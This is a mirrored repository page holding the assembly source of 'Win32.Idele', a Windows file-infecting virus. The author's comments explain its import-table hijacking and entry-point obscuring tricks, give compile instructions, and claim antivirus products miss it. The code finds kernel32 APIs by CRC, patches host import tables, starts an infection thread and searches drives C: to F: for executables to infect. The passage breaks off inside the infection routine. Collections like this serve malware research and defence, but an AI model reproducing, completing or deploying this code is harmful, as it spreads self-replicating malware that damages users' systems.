mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
1789 lines
39 KiB
NASM
1789 lines
39 KiB
NASM
|
Win32.Idele
|
|||
|
----------------------------------------------------------------[IDELE.ASM]---
|
|||
|
.386p
|
|||
|
.model flat
|
|||
|
|
|||
|
comment $
|
|||
|
|
|||
|
|
|||
|
Idele virus version 1.9
|
|||
|
by Doxtor L. /[T.I], July-December 2000
|
|||
|
|
|||
|
test version!! (infect goat*.exe files)
|
|||
|
|
|||
|
Disclaimer:
|
|||
|
|
|||
|
This program is a virus.
|
|||
|
It's not designed to be a destructive one, but anyway it's a virus !
|
|||
|
This virus is my third one, designed for Ms-Windows.
|
|||
|
All tests were performed on Win95/Winnt platforms.
|
|||
|
But i'm quite sure it runs fine on win98 too.
|
|||
|
It don't work fine on Win2k.
|
|||
|
It was written for educational purposes!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Greets:
|
|||
|
|
|||
|
-Androgyne : i hope to see soon a win32 virus of your own
|
|||
|
my "dear student" :)
|
|||
|
|
|||
|
-Bumblebee : Thanks for the informations
|
|||
|
|
|||
|
-Cryptic : Thanks for beta-testing
|
|||
|
|
|||
|
-Del armg0 : are you a reader of "Pif le chien"? :)
|
|||
|
|
|||
|
-Dyrdyr : you're a maths genius, man :)
|
|||
|
|
|||
|
-Mandragore : A day without alcohol/weed is a bad day?
|
|||
|
|
|||
|
-Spanska : fat 25yrs old girls are not necessary ugly ;)
|
|||
|
|
|||
|
-T00fic : Do you like my poetry? :)
|
|||
|
|
|||
|
-Darkman : Tania fan number one :)
|
|||
|
|
|||
|
-Giga : i'm too fat to be able to ride a pony :)
|
|||
|
|
|||
|
-LordJulus : i can't wait for your next tutorials :)
|
|||
|
|
|||
|
-M : heya "marchand de sabl<62>s"!
|
|||
|
|
|||
|
-Tally : a new virus for your collection!
|
|||
|
|
|||
|
-T2 : Is there a life be4 the death?
|
|||
|
|
|||
|
Vecna : when is the next full moon? :)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
...And all the vxers from undernet irc servers
|
|||
|
|
|||
|
|
|||
|
FREE VIRUSES !
|
|||
|
|
|||
|
Virus is knowledge!
|
|||
|
So trading viruses with ratios
|
|||
|
is an opposition to the free spreading of knowledge!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Description:
|
|||
|
|
|||
|
|
|||
|
This virus uses several viral technics.
|
|||
|
|
|||
|
Checksum/Crc32 routines to recognize API string in export section
|
|||
|
of Kernel32.dll
|
|||
|
|
|||
|
The main feature is that the sections flags of host aren't modified
|
|||
|
(except for import table) i.e, if a section is a non-writable one, after
|
|||
|
infection the section flag is still non-writable.
|
|||
|
|
|||
|
How we do that?
|
|||
|
The virus uses the GlobalAlloc API.
|
|||
|
This api is called first, to create a memory space to decrypt and run the
|
|||
|
main part of virus there. But we need a special routine to force targets
|
|||
|
to use this api.
|
|||
|
|
|||
|
To do that, we search in Import table of the target, an API string name
|
|||
|
with 11 or more, letters.
|
|||
|
|
|||
|
We patch the name with "GlobalAlloc" string.
|
|||
|
At run time, the infected host is loaded in memory by Windows, the address
|
|||
|
of GlobalAlloc API is set. Windows makes the job for us :)
|
|||
|
|
|||
|
So we need to patch the place this address is, with the correct
|
|||
|
one, we use GetProcAddress. (we can't pre-calculate a checksum for it
|
|||
|
because the name of this API isn't known before infection time)
|
|||
|
|
|||
|
|
|||
|
The virus uses the allocated memory space to move to/decrypt its main routine.
|
|||
|
So when the decryption is completed, the virus jumps to that new memory space.
|
|||
|
It creates an infectious thread and returns to host.
|
|||
|
|
|||
|
|
|||
|
The virus uses a *new* EPO technic. The virus don't patch the target code!
|
|||
|
and the virus don't change the entry point of target PE exe.
|
|||
|
As far i know , this is the first virus to use the following technic.
|
|||
|
|
|||
|
|
|||
|
A Windows application contains in its memory space an array that will be
|
|||
|
fullfilled with APIs addresses by the operating sytem.
|
|||
|
The virus at infection time, changes in target the address of the import
|
|||
|
table and create a small new one. The old table is fullfilled with
|
|||
|
the virus address. So when the infected host calls an API, the virus
|
|||
|
will be called first. The first thing, the virus does, is to rebuild
|
|||
|
the import table of the host at the right place!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
before infection:
|
|||
|
|
|||
|
Import table Code section
|
|||
|
|
|||
|
API1: >------------------- "call [API1]"
|
|||
|
XXXX
|
|||
|
|
|||
|
API2:
|
|||
|
YYYY >------------------- "Call [API2]"
|
|||
|
|
|||
|
(...) (...)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
After infection:
|
|||
|
|
|||
|
Old import table Code section New import table
|
|||
|
|
|||
|
|
|||
|
API1: API1:
|
|||
|
>virus address< >-----------"call [API1]" XXXX
|
|||
|
|
|||
|
API2: (...)
|
|||
|
>virus address<: >------------"call [API2]"
|
|||
|
|
|||
|
(...) (...) API(N):(N is often >=4)
|
|||
|
>GlobalAlloc address<
|
|||
|
|
|||
|
|
|||
|
Most people in vx-scene thinks applications in high level language
|
|||
|
call APIs using only two ways:
|
|||
|
|
|||
|
1) 2)
|
|||
|
call API: call [>address in Import table<]
|
|||
|
(...)
|
|||
|
API:
|
|||
|
jmp [>address in Import table<]
|
|||
|
|
|||
|
They are wrong!
|
|||
|
|
|||
|
In notepad.exe of Win95, i have found code like that:
|
|||
|
|
|||
|
mov edi,dword ptr [>Address in Import table<]
|
|||
|
call edi
|
|||
|
|
|||
|
And believe me, most of applications (Netscape 4.5 ...)
|
|||
|
can use that way to call an API.
|
|||
|
|
|||
|
|
|||
|
An infected program could be unstable due to the way it performs
|
|||
|
an API call!
|
|||
|
Happily the applications rarely call an API from Kernel32,
|
|||
|
using an "unusal" way, at the very beginning of their code !
|
|||
|
|
|||
|
|
|||
|
The W(rite) attribute is set in the section the Import table is to be
|
|||
|
Win NT4 compatible.
|
|||
|
Patch the Import table at run time seems impossible under Win2k!
|
|||
|
Even the use of WriteProcessMemory API don't help to solve that problem:(
|
|||
|
Happily there is a solution to bypass that...but it's another story :)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The infectious routine is a classic one:
|
|||
|
|
|||
|
-Search x target(s) on whole C:,D:,E:,F: drives and infects it/them.
|
|||
|
|
|||
|
-The thread begins with a pause, virus stop during x seconds before to infect.
|
|||
|
|
|||
|
-The virus is composed of 2 parts:
|
|||
|
|
|||
|
a loading routine to create memory space and decrypt the virus there
|
|||
|
(this routine is located in executable section of host)
|
|||
|
|
|||
|
and the main part of virus located in last section.
|
|||
|
|
|||
|
|
|||
|
This virus isn't detected by major anti-viruses at the time it was written.
|
|||
|
So once again, BE CAREFUL!
|
|||
|
|
|||
|
|
|||
|
To compile, use the following file:
|
|||
|
|
|||
|
Syntax is: compile virus (and not "compile virus.asm")
|
|||
|
[assuming the virus source code is named: virus.asm]
|
|||
|
The assembler used is tasm 5.0 (c)Borland
|
|||
|
|
|||
|
///// begin of compile.bat /////
|
|||
|
|
|||
|
|
|||
|
tasm32 /m /ml %1.asm
|
|||
|
tlink32 /Tpe /aa /c %1,%1.exe,,import32.lib
|
|||
|
rem pewrite.exe set the write attribute in all sections headers
|
|||
|
pewrite %1.exe
|
|||
|
del %1.obj
|
|||
|
del %1.map
|
|||
|
|
|||
|
///// End of compile.bat /////
|
|||
|
|
|||
|
To test the virus change the string "*.exe",0 into "test*.exe",0
|
|||
|
Remember the virus size need to be a 4 multiple!
|
|||
|
|
|||
|
$
|
|||
|
|
|||
|
%out WARNING!
|
|||
|
%out YOU HAVE JUST COMPILED A FULL FUNCTIONNAL VIRUS!
|
|||
|
%out ERASE IT, IF YOU DON'T KNOW WHAT YOU'RE DOING!
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
extrn ExitProcess :Proc ;only for the 1st generation
|
|||
|
extrn MessageBoxA :Proc
|
|||
|
extrn GetProcAddress :Proc
|
|||
|
extrn GetModuleHandleA :Proc
|
|||
|
extrn Sleep :Proc
|
|||
|
|
|||
|
|
|||
|
.data
|
|||
|
|
|||
|
|
|||
|
T db "Warning!" ,0
|
|||
|
Message db "Ready to be infected" ,0ah,0dh
|
|||
|
db "by Idele " ,0ah,0dh
|
|||
|
db "virus v 1.9 /[T.I] ?" ,0ah,0dh,0
|
|||
|
|
|||
|
Message2 db "Exit infection?" ,0
|
|||
|
|
|||
|
Krl32 db "KERNEL32.DLL",0
|
|||
|
|
|||
|
EP0 db 0,0
|
|||
|
EP db "ExitProcess",0
|
|||
|
|
|||
|
HereisAddy4Message2 dd 0
|
|||
|
|
|||
|
|
|||
|
Fake_OFT dd offset EP0,0,0,0
|
|||
|
Fake_FT dd 0,0,0,0
|
|||
|
|
|||
|
Addy4EP dd 0
|
|||
|
|
|||
|
|
|||
|
.code ;code executable starts here
|
|||
|
|
|||
|
HOST:
|
|||
|
|
|||
|
mov eax,LoaderLength
|
|||
|
mov eax,EndVir-BeginVir ;the real size is a multiple of 4
|
|||
|
|
|||
|
push 30h ;warning message
|
|||
|
push offset T
|
|||
|
push offset Message
|
|||
|
push 0
|
|||
|
call MessageBoxA
|
|||
|
|
|||
|
|
|||
|
push offset Krl32 ;retrieve Kernel32.dll address
|
|||
|
call GetModuleHandleA
|
|||
|
|
|||
|
push offset EP ;retrieve ExitProcess address
|
|||
|
push eax
|
|||
|
call GetProcAddress
|
|||
|
|
|||
|
mov dword ptr [Addy4EP],eax
|
|||
|
mov dword ptr [Import],offset Addy4EP
|
|||
|
|
|||
|
mov dword ptr [VA_API],offset EP
|
|||
|
|
|||
|
mov dword ptr [VA_OFT],offset Fake_OFT
|
|||
|
mov dword ptr [VA_FT],offset Fake_FT
|
|||
|
mov dword ptr [ApiHack],offset EP
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
lea eax,HereisAddy4Message2
|
|||
|
mov dword ptr [eax],offset Msg2
|
|||
|
|
|||
|
xor ebp,ebp
|
|||
|
jmp FillUpJump
|
|||
|
|
|||
|
|
|||
|
Msg2:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
push 5000 ;time needed to infect
|
|||
|
call Sleep
|
|||
|
|
|||
|
|
|||
|
|
|||
|
push 30h ;exit message
|
|||
|
push offset T
|
|||
|
push offset Message2
|
|||
|
push 0
|
|||
|
call MessageBoxA
|
|||
|
|
|||
|
push 0 ;exit first generation virus
|
|||
|
call ExitProcess
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;[real start of virus]:
|
|||
|
|
|||
|
BeginVir:
|
|||
|
|
|||
|
call Delta
|
|||
|
|
|||
|
Delta: ;compute delta offset
|
|||
|
pop ebp
|
|||
|
sub ebp,offset Delta
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov eax,dword ptr [esp+32] ;search in stack return
|
|||
|
;address
|
|||
|
|
|||
|
|
|||
|
mov cl,byte ptr [eax-5] ;read first byte of "call"
|
|||
|
;opcode
|
|||
|
|
|||
|
cmp cl,15h ;is 15?
|
|||
|
jnz Jump_Far ;no...it's a call yyyy
|
|||
|
|
|||
|
|
|||
|
mov eax,dword ptr [eax-4] ;...yes it's call [xxxxx]
|
|||
|
;read xxxx, xxxx is a pointer
|
|||
|
;to API address
|
|||
|
|
|||
|
jmp FillUpJump
|
|||
|
|
|||
|
Jump_Far: ;it's a call yyyy
|
|||
|
|
|||
|
|
|||
|
add eax,dword ptr [eax-4] ;what is the destination of
|
|||
|
inc eax ;"call yyyy"?
|
|||
|
inc eax ;
|
|||
|
mov eax,dword ptr [eax] ;
|
|||
|
;
|
|||
|
|
|||
|
FillUpJump:
|
|||
|
|
|||
|
mov dword ptr [JumpAway+ebp],eax
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ComputeKernelAddress:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
db 8bh,15h ;mov edx,dword [Import]
|
|||
|
Import dd 0 ;Import is an address in Import table
|
|||
|
;[ ]= adress of GlobalAlloc (in second generation)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;***** Search kernel32.dll address in memory
|
|||
|
; In :edx=address in kernel32
|
|||
|
;***** Out:edx=kernel32.dll address
|
|||
|
|
|||
|
|
|||
|
mov eax,edx
|
|||
|
|
|||
|
Loop:
|
|||
|
|
|||
|
dec edx
|
|||
|
cmp word ptr [edx],"ZM"
|
|||
|
jnz Loop
|
|||
|
|
|||
|
MZ_found: ; "MZ" found
|
|||
|
;is it the beginning of Kernel?
|
|||
|
mov ecx,edx
|
|||
|
mov ecx,[ecx+03ch]
|
|||
|
add ecx,edx
|
|||
|
cmp ecx,eax
|
|||
|
|
|||
|
jg Loop ;this test avoid page fault
|
|||
|
|
|||
|
cmp word ptr [ecx] ,"EP"
|
|||
|
jnz Loop
|
|||
|
|
|||
|
;***** End of search kernel routine
|
|||
|
|
|||
|
|
|||
|
;***** Search apis addresses needed
|
|||
|
; In : edx=IMAGE BASE of KERNEL32
|
|||
|
;***** Out: Searched Apis addresses are put in a Table of Dword
|
|||
|
|
|||
|
mov eax,[edx+3ch] ;eax=RVA of PE-header
|
|||
|
add eax,edx ;eax=Address of PE-header
|
|||
|
mov eax,[eax+78h] ;eax=RVA of EXPORT DIRECTORY section
|
|||
|
add eax,edx ;eax=Address of EXPORT DIRECTORY section
|
|||
|
mov esi,[eax+20h] ;esi=RVA of the table containing pointers
|
|||
|
|
|||
|
|
|||
|
add esi,edx ;esi=Address of this table,
|
|||
|
;a pointer to the name of the first
|
|||
|
;exported function
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
xor ebx,ebx ;ebx holds Api index
|
|||
|
dec ebx
|
|||
|
mov ecx,ApiNb ;number of Apis remaining
|
|||
|
sub esi,4
|
|||
|
|
|||
|
MainLoop:
|
|||
|
|
|||
|
add esi,4
|
|||
|
|
|||
|
inc ebx
|
|||
|
|
|||
|
;***** Crc computing of the current Api name
|
|||
|
; In : esi: RVA of name
|
|||
|
;***** Out: Crc variable contains the Crc of current name string
|
|||
|
|
|||
|
|
|||
|
ComputeCrc:
|
|||
|
|
|||
|
pushad
|
|||
|
mov esi,dword ptr [esi]
|
|||
|
add esi,edx
|
|||
|
xor ecx,ecx
|
|||
|
xor eax,eax
|
|||
|
|
|||
|
Again:
|
|||
|
|
|||
|
Lodsb
|
|||
|
or al,al
|
|||
|
jz SeeU
|
|||
|
add cl,al
|
|||
|
rol eax,cl
|
|||
|
add ecx,eax
|
|||
|
jmp Again
|
|||
|
|
|||
|
|
|||
|
SeeU:
|
|||
|
|
|||
|
|
|||
|
mov dword ptr [Crc+ebp],ecx
|
|||
|
popad
|
|||
|
|
|||
|
|
|||
|
;***** End of crc computing routine
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;***** Test Crc
|
|||
|
; In : Esi: Current Api name address
|
|||
|
; Out: Esi= following name
|
|||
|
;***** Ecx= Api (pointer) index in the "table of names"
|
|||
|
|
|||
|
|
|||
|
TestCrc:
|
|||
|
|
|||
|
|
|||
|
push eax
|
|||
|
mov eax,dword ptr [Crc+ebp]
|
|||
|
mov ecx,ApiNb+1
|
|||
|
lea edi,ApiList+ebp
|
|||
|
repne scasd
|
|||
|
pop eax
|
|||
|
jecxz MainLoop
|
|||
|
|
|||
|
Found:
|
|||
|
|
|||
|
pushad
|
|||
|
add edi,offset CloseHandle-(offset ApiList+4) ;Api position
|
|||
|
;in our table
|
|||
|
|
|||
|
mov ecx,dword ptr [eax+36]
|
|||
|
add ecx,edx
|
|||
|
lea ecx,[ecx+2*ebx]
|
|||
|
mov bx,word ptr [ecx]
|
|||
|
mov ecx,dword ptr [eax+1ch]
|
|||
|
add ecx,edx
|
|||
|
mov ecx,dword ptr [ecx+4*ebx]
|
|||
|
add ecx,edx
|
|||
|
mov dword ptr [edi],ecx
|
|||
|
popad
|
|||
|
Loop MainLoop
|
|||
|
|
|||
|
;***** End of crc test routine
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;***** End of Apis searching routine
|
|||
|
|
|||
|
;routine:
|
|||
|
;on copie les adresses que Windows a mis dans la table FT vers
|
|||
|
;la vraie table qui commence <20> VA_FT
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;We need to patch the import table of host.
|
|||
|
;But first we need to compute the address of the Api we have replaced
|
|||
|
;by GlobalAlloc
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;[Compute address of hacked api]:
|
|||
|
|
|||
|
push edx
|
|||
|
|
|||
|
lea ebx,ApiHack+ebp
|
|||
|
push ebx
|
|||
|
push edx
|
|||
|
call dword ptr [_GetProcAddress+ebp]
|
|||
|
mov dword ptr [ApiOriginalAdd+ebp],eax
|
|||
|
|
|||
|
|
|||
|
call dword ptr [GetCurrentProcessId+ebp]
|
|||
|
|
|||
|
push eax
|
|||
|
push 0
|
|||
|
push 10h or 20h or 08h
|
|||
|
call dword ptr [OpenProcess+ebp]
|
|||
|
xchg eax,ebx
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
pop edx
|
|||
|
xor ecx,ecx
|
|||
|
mov esi,dword ptr [VA_OFT+ebp]
|
|||
|
|
|||
|
|
|||
|
lea edi,API_Buffer+ebp
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ALoop:
|
|||
|
|
|||
|
|
|||
|
lodsd
|
|||
|
|
|||
|
|
|||
|
or eax,eax
|
|||
|
jnz FollowMe
|
|||
|
|
|||
|
or ch,ch
|
|||
|
jnz GetOut
|
|||
|
|
|||
|
mov eax,dword ptr [VA_API+ebp]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
inc ch
|
|||
|
|
|||
|
jmp ComputeAPI
|
|||
|
|
|||
|
FollowMe:
|
|||
|
|
|||
|
|
|||
|
add eax,dword ptr [ImageBase+ebp]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
inc eax
|
|||
|
inc eax
|
|||
|
|
|||
|
|
|||
|
ComputeAPI:
|
|||
|
push esi
|
|||
|
push edi
|
|||
|
push ecx
|
|||
|
push edx
|
|||
|
|
|||
|
|
|||
|
push eax
|
|||
|
push edx
|
|||
|
call dword ptr [_GetProcAddress+ebp]
|
|||
|
|
|||
|
|
|||
|
pop edx
|
|||
|
pop ecx
|
|||
|
pop edi
|
|||
|
pop esi
|
|||
|
|
|||
|
stosd
|
|||
|
|
|||
|
inc cl
|
|||
|
|
|||
|
jmp ALoop
|
|||
|
|
|||
|
GetOut:
|
|||
|
|
|||
|
|
|||
|
push 0
|
|||
|
xor ch,ch
|
|||
|
shl ecx,2
|
|||
|
push ecx
|
|||
|
|
|||
|
lea eax,API_Buffer+ebp
|
|||
|
push eax
|
|||
|
|
|||
|
push dword ptr [VA_FT+ebp]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
push ebx
|
|||
|
call dword ptr [WriteProcessMemory+ebp]
|
|||
|
|
|||
|
|
|||
|
;[Restore host hacked api]:
|
|||
|
|
|||
|
push 0
|
|||
|
push 4
|
|||
|
lea eax,ApiOriginalAdd+ebp ;source
|
|||
|
push eax
|
|||
|
db 68h ;push value
|
|||
|
HackAdd: ;destination
|
|||
|
dd 0
|
|||
|
|
|||
|
push ebx
|
|||
|
call Dword ptr [WriteProcessMemory+ebp]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;[Create_Thread]:
|
|||
|
|
|||
|
|
|||
|
lea ebx,ThreadID+ebp
|
|||
|
push ebx
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
lea ebx,_Thread+ebp
|
|||
|
push ebx
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
call dword ptr [CreateThread+ebp]
|
|||
|
|
|||
|
;[Go on API call]:
|
|||
|
|
|||
|
|
|||
|
popad
|
|||
|
db 0ffh,25h ;jump [ ]
|
|||
|
JumpAway dd 0
|
|||
|
|
|||
|
_Thread:
|
|||
|
|
|||
|
call DeltaOff
|
|||
|
DeltaOff:
|
|||
|
pop ebp
|
|||
|
sub ebp,offset DeltaOff
|
|||
|
|
|||
|
push Miliseconds
|
|||
|
call dword ptr [_Sleep+ebp]
|
|||
|
|
|||
|
|
|||
|
;[Save current directory]:
|
|||
|
|
|||
|
lea eax,DirExe+ebp
|
|||
|
push eax
|
|||
|
push 260
|
|||
|
call Dword ptr [GetCurrentDirectoryA+ebp]
|
|||
|
|
|||
|
;***** Main routine (directory-tree search algorithm)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov dword ptr [Counter+ebp],HowMany
|
|||
|
mov dword ptr [Depth+ebp],0
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SearchDisk:
|
|||
|
|
|||
|
|
|||
|
inc dword ptr [Key+ebp]
|
|||
|
mov eax,dword ptr [Key+ebp]
|
|||
|
|
|||
|
xor edx,edx
|
|||
|
xor ecx,ecx
|
|||
|
mov cl,4
|
|||
|
div ecx
|
|||
|
xchg eax,edx
|
|||
|
|
|||
|
add al,43h
|
|||
|
mov byte ptr [DiskName+ebp],al
|
|||
|
|
|||
|
|
|||
|
lea eax,DiskName+ebp
|
|||
|
push eax
|
|||
|
call dword ptr [GetDriveTypeA+ebp]
|
|||
|
cmp al,3
|
|||
|
jnz SearchDisk
|
|||
|
|
|||
|
db 0c7h,85h
|
|||
|
dd offset FileName
|
|||
|
DiskName db "C"
|
|||
|
db ":",0
|
|||
|
|
|||
|
|
|||
|
Find0:
|
|||
|
inc dword ptr [Depth+ebp]
|
|||
|
push ebx
|
|||
|
lea eax,FileName+ebp
|
|||
|
push eax
|
|||
|
call dword ptr [SetCurrentDirectoryA+ebp]
|
|||
|
or eax,eax
|
|||
|
jz Updir0
|
|||
|
|
|||
|
;****** InfectCurrentDir
|
|||
|
|
|||
|
|
|||
|
lea esi,FileAttributes+ebp
|
|||
|
push esi
|
|||
|
lea edi,FindMatch+ebp ;target string name
|
|||
|
push edi
|
|||
|
call dword ptr [FindFirstFileA+ebp] ;return a search handle
|
|||
|
mov ebx,eax ;handle is put into ebx
|
|||
|
inc eax
|
|||
|
jz FindF
|
|||
|
|
|||
|
call Infect
|
|||
|
|
|||
|
|
|||
|
Next:
|
|||
|
|
|||
|
push esi
|
|||
|
push ebx
|
|||
|
call [FindNextFileA+ebp]
|
|||
|
or eax,eax
|
|||
|
jz FindF
|
|||
|
|
|||
|
call Infect
|
|||
|
|
|||
|
jmp Next
|
|||
|
|
|||
|
;***** End of infect current dir routine
|
|||
|
|
|||
|
|
|||
|
;[Findfirst dir]:
|
|||
|
|
|||
|
FindF:
|
|||
|
|
|||
|
push ebx
|
|||
|
call dword ptr [FindClose+ebp]
|
|||
|
|
|||
|
lea esi,FileAttributes+ebp
|
|||
|
push esi
|
|||
|
lea edi,FindMatch2+ebp
|
|||
|
push edi
|
|||
|
call dword ptr [FindFirstFileA+ebp]
|
|||
|
|
|||
|
mov ebx,eax
|
|||
|
inc eax
|
|||
|
jz Updir0
|
|||
|
|
|||
|
Find:
|
|||
|
mov eax,dword ptr [FileAttributes+ebp]
|
|||
|
and eax,10h
|
|||
|
jz FindN
|
|||
|
|
|||
|
cmp byte ptr [FileName+ebp],"."
|
|||
|
jnz Find0
|
|||
|
|
|||
|
;[FindNext dir routine]:
|
|||
|
|
|||
|
FindN:
|
|||
|
lea esi,FileAttributes+ebp
|
|||
|
push esi
|
|||
|
push ebx
|
|||
|
call dword ptr [FindNextFileA+ebp]
|
|||
|
or eax,eax
|
|||
|
jnz Find
|
|||
|
|
|||
|
Updir:
|
|||
|
push ebx
|
|||
|
call dword ptr [FindClose +ebp]
|
|||
|
|
|||
|
Updir0:
|
|||
|
|
|||
|
dec dword ptr [Depth+ebp]
|
|||
|
jz Exit
|
|||
|
|
|||
|
pop ebx
|
|||
|
|
|||
|
lea eax,DotDot+ebp
|
|||
|
push eax
|
|||
|
|
|||
|
call dword ptr [SetCurrentDirectoryA+ebp]
|
|||
|
jmp FindN
|
|||
|
|
|||
|
Exit0:
|
|||
|
pop eax
|
|||
|
|
|||
|
Exit:
|
|||
|
|
|||
|
push ebx
|
|||
|
call dword ptr [FindClose+ebp]
|
|||
|
|
|||
|
;[Restore saved directory]:
|
|||
|
|
|||
|
lea eax,DirExe+ebp
|
|||
|
push eax
|
|||
|
call dword ptr [SetCurrentDirectoryA+ebp]
|
|||
|
jmp _Thread
|
|||
|
|
|||
|
|
|||
|
Infect:
|
|||
|
|
|||
|
pushad
|
|||
|
|
|||
|
TestFile:
|
|||
|
|
|||
|
add dword ptr [FileSize+ebp],VirLength
|
|||
|
|
|||
|
|
|||
|
;***** Test if the file is a true PE-executable file
|
|||
|
|
|||
|
call OpenFileStuff
|
|||
|
jc ExitInfectError
|
|||
|
|
|||
|
|
|||
|
push edx ;save mapping address
|
|||
|
|
|||
|
cmp dword ptr [edx+3ch],200h ;Avoid Page Fault
|
|||
|
jg ExitInfectError0
|
|||
|
|
|||
|
|
|||
|
add edx,dword ptr [edx+3ch] ;edx points to PE-header
|
|||
|
cmp word ptr [edx],"EP" ;true PE exe there?
|
|||
|
jnz ExitInfectError0
|
|||
|
|
|||
|
|
|||
|
;***** End of EXE-PE test
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;***** Already infected?
|
|||
|
|
|||
|
pop ecx
|
|||
|
cmp word ptr [ecx+12h],"IT" ;infected?
|
|||
|
jz ExitInfectError
|
|||
|
push ecx
|
|||
|
|
|||
|
;**** End of infection test
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov edi,edx
|
|||
|
add edi,18h ;edi=beginning of optional header
|
|||
|
|
|||
|
|
|||
|
;[Compute RVA of first section header]:
|
|||
|
|
|||
|
mov ebx,dword ptr [edi+10h] ;ebx=Entry Point RVA
|
|||
|
push ebx ;save it
|
|||
|
|
|||
|
|
|||
|
movzx ecx,word ptr [edx+14h] ;cx=size of optionnal header
|
|||
|
add edi,ecx ;edi points to 1st section header
|
|||
|
movzx ecx,word ptr [edx+06h] ;cx= number of sections
|
|||
|
mov dword ptr [SectN+ebp],ecx
|
|||
|
mov ebx,edi ;ebx points on 1st section header
|
|||
|
|
|||
|
|
|||
|
;[compute last section header address]:
|
|||
|
|
|||
|
xor eax,eax ;set eax=0
|
|||
|
dec ecx ;ecx=number of sections -1
|
|||
|
|
|||
|
mov esi,edi ;esi=first section header
|
|||
|
;address
|
|||
|
mov al,28h ;al=size of a section header
|
|||
|
mul cl ;eax=28h*(number of section-1)
|
|||
|
add esi,eax ;esi=pointer to last section
|
|||
|
;header
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;ebx,edi=beginning of 1st section header
|
|||
|
|
|||
|
pop eax ;put Entry Point RVA in eax
|
|||
|
|
|||
|
;***** Search code section:
|
|||
|
; In : ebx holds file pointer to first section header
|
|||
|
; : eax holds Entry Point RVA
|
|||
|
;***** Out: ebx holds File ptr to the "code section"
|
|||
|
|
|||
|
|
|||
|
NotEnough:
|
|||
|
add ebx,28h
|
|||
|
cmp dword ptr [ebx+12],eax
|
|||
|
jg FoundCode
|
|||
|
loop NotEnough
|
|||
|
jmp ExitInfectError0
|
|||
|
|
|||
|
FoundCode:
|
|||
|
sub ebx,28h
|
|||
|
|
|||
|
|
|||
|
;***** Search code section end
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
cmp dword ptr [esi+16],0 ;don't want to infect files
|
|||
|
jz ExitInfectError0 ;with rawdata size=0 ...
|
|||
|
;no real section on disk here
|
|||
|
;if we try ...file is overwritten!
|
|||
|
|
|||
|
mov eax,dword ptr [esi+24h] ;don't want to infect files
|
|||
|
and eax,80000000h ;with a last section writable
|
|||
|
jnz ExitInfectError0 ;surely an exe archive or packed file
|
|||
|
|
|||
|
;edi= begin of section headers
|
|||
|
;ebx= begin of code section
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;eax= begin of code section header
|
|||
|
|
|||
|
|
|||
|
mov eax,edi
|
|||
|
pop edi ;restore Map Address
|
|||
|
push edi ;save " "
|
|||
|
|
|||
|
push eax
|
|||
|
|
|||
|
mov ecx,LoaderLength
|
|||
|
dec ecx
|
|||
|
add edi,dword ptr [ebx+10h]
|
|||
|
add edi,dword ptr [ebx+14h]
|
|||
|
dec edi
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Empty:
|
|||
|
|
|||
|
std
|
|||
|
xor al,al
|
|||
|
repe scasb
|
|||
|
|
|||
|
xchg eax,edi
|
|||
|
pop edi
|
|||
|
or ecx,ecx
|
|||
|
cld
|
|||
|
jnz ExitInfectError0
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;[Import table patching routine]:
|
|||
|
|
|||
|
pushad
|
|||
|
mov eax,dword ptr [edx+18h+1ch] ;save on stack ImageBase
|
|||
|
mov dword ptr [ImageBase+ebp],eax
|
|||
|
push eax
|
|||
|
|
|||
|
mov eax,dword ptr [edx+80h] ;eax= address of the
|
|||
|
;"import table"
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;[search import section]:
|
|||
|
;in: edi=map pointer to first section header
|
|||
|
|
|||
|
|
|||
|
|
|||
|
pushad
|
|||
|
|
|||
|
SearchImport:
|
|||
|
|
|||
|
add edi,28h
|
|||
|
|
|||
|
|
|||
|
cmp dword ptr [edi+12],eax
|
|||
|
jg FoundImport
|
|||
|
jmp SearchImport
|
|||
|
|
|||
|
FoundImport:
|
|||
|
|
|||
|
sub edi,28h
|
|||
|
|
|||
|
or dword ptr [edi+24h],80000000h ;set W attribute to
|
|||
|
;Import section
|
|||
|
|
|||
|
mov eax,dword ptr [edi+12]
|
|||
|
add eax,dword ptr [edi+10h]
|
|||
|
|
|||
|
|
|||
|
mov esi,eax ;esi=RVA to the end of import
|
|||
|
;section
|
|||
